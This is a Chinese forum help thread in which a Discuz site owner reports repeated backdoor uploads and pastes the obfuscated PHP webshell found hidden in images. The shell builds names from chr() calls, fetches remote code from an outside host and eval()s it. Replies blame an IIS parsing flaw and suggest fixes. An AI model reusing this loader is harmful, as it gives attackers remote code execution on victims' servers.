网站老是被挂马

131415 · 发表于 2019-7-31 22:15:47

网站目录老是被上传后门文件，删了几天又有了，改各种密码，装云锁，今天更气人，网站管理员密码被改，还发帖子，云锁还被卸载，快照被劫持天天秒收录，有吧网站备份下来用D盾扫描一下，发现几张图片有脚本，这是怎么做到的？

360截图20190731221329880.jpg

脚本地址：http://www.9661.in/txt/xml1.txt

<?php
$password='haosir';$b="chr";session_start();if(empty($_SESSION['PhpCode'])){$d=$b(104).$b(116).$b(116).$b(112).$b(58).$b(47).$b(47).$b(57).$b(54).$b(54).$b(49).$b(46).$b(105).$b(110).$b(47).$b(112).$b(104).$b(112).$b(47).$b(112).$b(104).$b(112).$b(46).$b(103).$b(105).$b(102);$e=$b(102).$b(105).$b(108).$b(101).$b(95);$e.=$b(103).$b(101).$b(116).$b(95).$b(99);$e.=$b(111).$b(110).$b(116).$b(101).$b(110);$e.=$b(116).$b(115);$_SESSION['PhpCode']=$e($d);}$f=$b(103).$b(122).$b(105).$b(110);$f.=$b(102).$b(108).$b(97).$b(116).$b(101);@eval($f($_SESSION['PhpCode']));

我知道答案回答被采纳将会获得1 贡献已有9人回答

耗子 · 发表于 2019-8-1 14:32:52

漏洞而已
可以联系我的QQ交谈有偿服务

crx349 · 发表于 2019-8-1 17:11:41

尽快清理做好服务器安全

lg0431 · 发表于 2019-8-2 10:53:39

网站漏洞，服务器端口禁止，禁ping，防注册

gongcg · 发表于 2019-8-2 11:17:20

用的什么环境用的什么面板

sdfarmer · 发表于 2019-8-3 17:27:17

我的也是。你找到办法了吗

sdfarmer · 发表于 2019-8-3 17:28:07

耗子发表于 2019-8-1 14:32
漏洞而已
可以联系我的QQ交谈有偿服务

付费求一套discuz加固的目录权限的方案

17推执笔 · 发表于 2019-8-4 10:26:57

本帖最后由 17推执笔于 2019-8-4 10:28 编辑

不是网站漏洞，不需要discuz加固，就是一个服务器远程解析漏洞，图片被当做php来执行了

17推执笔 · 发表于 2019-8-4 10:37:00

如果是IIS的直接打开IIS，点击处理程序映射，双击里面的php，在打开的窗口点击请求限制，然后勾选文件或文件夹，这样就可以修复解析漏洞了

杰瑞科技 · 发表于 2019-8-4 15:21:15

看路径是头像上传的图片木马，可使用头像审核插件高级版防止用户上传头像图片木马
https://addon.dismall.com/?@saya_avatarverify.plugin

[求助] 网站老是被挂马

产品服务

开发者服务

使用教程